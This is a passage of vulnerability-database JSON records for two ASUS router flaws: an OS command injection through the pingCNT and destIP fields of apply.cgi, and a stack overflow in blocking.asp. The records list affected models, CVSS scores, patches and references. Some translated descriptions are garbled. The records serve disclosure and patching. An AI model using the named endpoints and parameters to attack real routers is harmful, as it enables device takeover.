"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac2900",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac86u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac87u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac86u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac1900",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac2900",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3100 \u003c3.0.0.4.384 10007",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.246"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.354"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.260"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.374.5047"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.374_4887"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.140"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.374.4755"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.220"
},
{
"model": "rt-ac66u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.270"
},
{
"model": "rt-ac68u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "3.0.0.4.374_4561"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac1900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac2900_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac3100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac3200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac5300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac68u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac86u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac87u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-ac88u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asus:rt-n18u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "b1ack0wl",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
}
],
"trust": 0.6
},
"cve": "CVE-2018-9285",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CVE-2018-9285",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 1.9,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-63980",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-139317",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-9285",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-9285",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-9285",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-63980",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201804-298",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-139317",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-9285",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "VULHUB",
"id": "VHN-139317"
},
{
"db": "VULMON",
"id": "CVE-2018-9285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Main_Analysis_Content.asp in /apply.cgi on ASUS RT-AC66U, RT-AC68U, RT-AC86U, RT-AC88U, RT-AC1900, RT-AC2900, and RT-AC3100 devices before 3.0.0.4.384_10007; RT-N18U devices before 3.0.0.4.382.39935; RT-AC87U and RT-AC3200 devices before 3.0.0.4.382.50010; and RT-AC5300 devices before 3.0.0.4.384.20287 allows OS command injection via the pingCNT and destIP fields of the SystemCmd variable. plural ASUS The product includes OS A command injection vulnerability exists.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS RT-AC66U, etc. are all wireless router products of ASUS. Attackers can use the percent and desktOP fields of the System Cmd variable to inject this vulnerability and execute operating system commands with higher authority. The following products and versions are affected: ASUS RT-AC66U; RT-AC68U; RT-AC86U; RT-AC88U; RT-AC1900; .382.39935 prior; RT-AC87U and RT-AC3200 prior to 3.0.0.4.382.50010; RT-AC5300 prior to 3.0.0.4.384.20287",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-9285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "VULHUB",
"id": "VHN-139317"
},
{
"db": "VULMON",
"id": "CVE-2018-9285"
}
],
"trust": 2.34
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-139317",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-139317"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-9285",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "160049",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-63980",
"trust": 0.7
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298",
"trust": 0.7
},
{
"db": "CXSECURITY",
"id": "WLB-2020110103",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-139317",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-9285",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "VULHUB",
"id": "VHN-139317"
},
{
"db": "VULMON",
"id": "CVE-2018-9285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"id": "VAR-201804-1341",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "VULHUB",
"id": "VHN-139317"
}
],
"trust": 1.297841215
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
}
]
},
"last_update_date": "2024-11-23T22:06:52.257000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.asus.com/sg/"
},
{
"title": "Patch for ASUS TM-AC1900 arbitrary command execution vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/240217"
},
{
"title": "Multiple ASUS Product operating system command injection vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=83120"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-139317"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/160049/asus-tm-ac1900-arbitrary-command-execution.html"
},
{
"trust": 2.6,
"url": "https://www.fortinet.com/blog/threat-research/fortiguard-labs-discovers-vulnerability-in-asus-router.html"
},
{
"trust": 1.8,
"url": "https://fortiguard.com/zeroday/fg-vd-17-216"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9285"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-9285"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2020110103"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "VULHUB",
"id": "VHN-139317"
},
{
"db": "VULMON",
"id": "CVE-2018-9285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"db": "VULHUB",
"id": "VHN-139317"
},
{
"db": "VULMON",
"id": "CVE-2018-9285"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"date": "2018-04-04T00:00:00",
"db": "VULHUB",
"id": "VHN-139317"
},
{
"date": "2018-04-04T00:00:00",
"db": "VULMON",
"id": "CVE-2018-9285"
},
{
"date": "2018-06-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"date": "2018-04-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"date": "2018-04-04T19:29:00.687000",
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-11-18T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-63980"
},
{
"date": "2018-05-22T00:00:00",
"db": "VULHUB",
"id": "VHN-139317"
},
{
"date": "2020-11-13T00:00:00",
"db": "VULMON",
"id": "CVE-2018-9285"
},
{
"date": "2018-06-18T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-004344"
},
{
"date": "2020-11-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201804-298"
},
{
"date": "2024-11-21T04:15:17.713000",
"db": "NVD",
"id": "CVE-2018-9285"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ASUS In product OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-004344"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201804-298"
}
],
"trust": 0.6
}
}
VAR-201911-1650
Vulnerability from variot - Updated: 2024-11-23 22:05Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id. Asuswrt-Merlin The firmware contains a vulnerability related to out-of-bounds writing.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asuswrt-Merlin is a firmware that runs in its router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201911-1650",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac66u",
"scope": "lt",
"trust": 1.0,
"vendor": "asus",
"version": "3.0.0.4.382.50470"
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asustek computer",
"version": null
},
{
"model": "asuswrt-merlin",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asus:rt-ac66u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
}
]
},
"cve": "CVE-2018-8879",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2018-8879",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2020-02713",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2018-8879",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-8879",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-8879",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2018-8879",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNVD",
"id": "CNVD-2020-02713",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201911-1254",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
},
{
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack-based buffer overflow in Asuswrt-Merlin firmware for ASUS devices older than 384.4 and ASUS firmware before 3.0.0.4.382.50470 for devices allows remote attackers to execute arbitrary code by providing a long string to the blocking.asp page via a GET or POST request. Vulnerable parameters are flag, mac, and cat_id. Asuswrt-Merlin The firmware contains a vulnerability related to out-of-bounds writing.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. ASUS Asuswrt-Merlin is a firmware that runs in its router",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-8879"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "CNVD",
"id": "CNVD-2020-02713"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-8879",
"trust": 3.0
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2020-02713",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1254",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
},
{
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"id": "VAR-201911-1650",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
}
],
"trust": 1.1596695499999998
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
}
]
},
"last_update_date": "2024-11-23T22:05:56.126000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "RT-AC66U",
"trust": 0.8,
"url": "https://www.asus.com/Networking/RTAC66U/HelpDesk_BIOS"
},
{
"title": "Patch for ASUS Asuswrt-Merlin blocking.asp buffer overflow vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/197547"
},
{
"title": "ASUS Asuswrt-Merlin Buffer error vulnerability fix",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=104042"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-787",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.2,
"url": "https://pagedout.institute/download/pagedout_001_beta1.pdf"
},
{
"trust": 1.6,
"url": "https://www.asus.com/networking/rtac66u/helpdesk_bios"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-8879"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-8879"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-02713"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-016158"
},
{
"db": "CNNVD",
"id": "CNNVD-201911-1254"
},
{
"db": "NVD",
"id": "CVE-2018-8879"
}
]
},
